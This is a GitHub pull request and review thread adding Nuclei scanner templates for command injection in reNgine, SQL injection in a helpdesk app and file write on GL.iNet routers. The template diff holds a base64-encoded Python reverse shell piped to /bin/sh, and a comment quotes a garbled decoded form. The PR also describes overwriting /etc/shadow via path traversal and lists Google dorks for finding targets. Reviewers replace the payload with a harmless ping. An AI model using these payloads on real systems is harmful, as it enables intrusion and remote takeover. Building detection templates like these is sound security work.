### PR TITLE
Added template for CVE-2023-46455, CVE-2023-50094

### PR DESCRIPTION
**Pull request by Zierax**
### Template / PR Information

This template checks for a command injection vulnerability in **reNgine v2.2.0**, where an authenticated user can manipulate parameters in the scan engine configuration to execute arbitrary system commands. 

- Added CVE: _None available currently_ (Exploit Title: "reNgine 2.2.0 - Command Injection (Authenticated)")
- References:
  - [reNgine Wiki](https://rengine.wiki/)
  - [GitHub Repository](https://github.com/yogeshojha/rengine)

### Template Validation

I've validated this template locally?
- [x] NO

#### Additional Details

- Google Query: `intitle:"reNgine"`
- Vulnerable parameters: `nmap_cmd`

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

---

### Template / PR Information

This template tests for SQL injection vulnerabilities in the **Customer Support System v1.0**, allowing an authenticated user to execute arbitrary SQL commands by injecting malicious payloads into specific parameters. 

- Added CVE: CVE-2023-50071
- References:
  - [Vendor Source Code](https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html)

### Template Validation

I've validated this template locally?
- [ ] YES

#### Additional Details

- Google Query: `inurl:"customer_support/index.php"`
- Affected Parameters: `department_id`, `customer_id`, `subject`
- Request Payload: `POST /customer_support/ajax.php?action=save_ticket`

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

---

### Template / PR Information

This template checks for an arbitrary file write vulnerability in **GL.iNet devices (<= 4.3.7)**. An attacker can overwrite system files, including the shadow file, allowing modification of root access credentials.

- Added CVE: CVE-2023-46455
- References:
  - [Vendor Homepage](https://www.gli-net.com)

### Template Validation

I've validated this template locally?
- [ ] YES

#### Additional Details

- Google Query: `intitle:"GL.iNet Admin Panel"`
- Affected Version: GL.iNet devices with firmware <= 4.3.7
- Exploit URL: `/upload`
- File Path Traversal to `/etc/shadow`

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

### CODE REVIEW

File: http/vulnerabilities/other/rengine-command-injection.yaml [hunk 1]
```diff
@@ -0,0 +1,55 @@
...
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/scan-engine/update"  # Adjust the endpoint for modifying scan engines
+    body: |
+      nmap_cmd: 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2V0LkFfSU5FVCxzLmNvbm5lY3QoIiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  # Modify this as needed for proper syntax
```
Comment (yoerivegt) [inline http/vulnerabilities/other/rengine-command-injection.yaml:46]: Is this invalid base64?

Comment (Zierax) [reply http/vulnerabilities/other/rengine-command-injection.yaml:46]: no this is a valid base 64 and this is the original code
python3 -c 'import socket,os,pty;s=socket.socket(socet.A_INET,s.connect("##CBSc"cc"2GW"2fV2GW"2fV2GW"2fV"G7v"&6"r

Comment (dwisiswant0) [reply http/vulnerabilities/other/rengine-command-injection.yaml:46]: Getting a pingback to the `interactsh-url` is enough.

Comment (Zierax) [reply http/vulnerabilities/other/rengine-command-injection.yaml:46]: okay here is the update for ping interactsh-url only
but what is the variable should I add in the encoded code for ping interactsh-url ?

Comment (Zierax) [reply http/vulnerabilities/other/rengine-command-injection.yaml:46]: should I push now 
```yaml
path:
  - "{{BaseURL}}/scan-engine/update"  # Adjust the endpoint for modifying scan engines
body: |
  nmap_cmd: 'echo "cGluZyAiJHt7aW50ZXJhY3RzaC11cmx9fSI=" | base64 --decode | /bin/sh'  # Sends ping to {{interactsh-url}} 
```

decoded version
path:
  - "{{BaseURL}}/scan-engine/update"  # Adjust the endpoint for modifying scan engines
body: |
  nmap_cmd: 'echo "ping "${{interactsh-url}}"" | base64 --decode | /bin/sh'  # Sends ping to {{interactsh-url}}

Comment (Zierax) [reply http/vulnerabilities/other/rengine-command-injection.yaml:46]: hi ??

**Review by Zierax — COMMENTED** [review]
#######EDIT_TO_MAKE_THE_TEMPLATE_PING_INTERACTSH#######

path:
  - "{{BaseURL}}/scan-engine/update"  # Adjust the endpoint for modifying scan engines
body: |
  nmap_cmd: 'echo "cGluZyAiJHt7aW50ZXJhY3RzaC11cmx9fSI=" | base64 --decode | /bin/sh'  # Sends ping to {{interactsh-url}} 
  
  
  #######EDIT_TO_MAKE_THE_TEMPLATE_PING_INTERACTSH#######

**Comment by mastercho** [comment]
Interesting, never saw reNgine had vuln before, about GL.iNet don't you think this payload is dangerous to run on prod?

**Comment by Zierax** [comment]
This CVE was first exposed on **2024-09-29**, so it's understandable if this is the first time you've heard about this vulnerability.

## Reference
- [Exploit Database Entry](https://www.exploit-db.com/exploits/52081)

I haven’t publicly disclosed the vulnerability details yet. However, since there were no existing Nuclei templates for this vulnerability, I created one myself.

I'm also planning to compile a comprehensive list of unknown vulnerabilities and publish it.

**Comment by Zierax** [comment]
I am waiting for the accept :)

**Comment by Zierax** [comment]
first time to know those has CVEs 
can you rename the templates?

**Comment by ritikchaddha** [comment]
Hi @Zierax, I've removed the `customer-support-system-sql-injection` template. At this time, we are not accepting/adding templates for those that are less widely used php projects. Thank you for your understanding!

**Comment by ritikchaddha** [comment]
It is crucial to avoid overwriting sensitive files like `/etc/shadow` or `/etc/etc`in template `gl-inet-arbitrary-file-write`. Instead, please consider updating the template or add another file.

Additionally, don’t forget to update both templates with the POC reference for clarity.

**Comment by Zierax** [comment]
Done;

**Comment by ritikchaddha** [comment]
Hi @Zierax, both templates appear to be authenticated. To help validate the matchers, could you please share the debug data for the templates of CVE-2023-46455 and CVE-2023-50094? 

Thank you!

**Review by DhiyaneshGeek — APPROVED** [review]

**Pull request merged**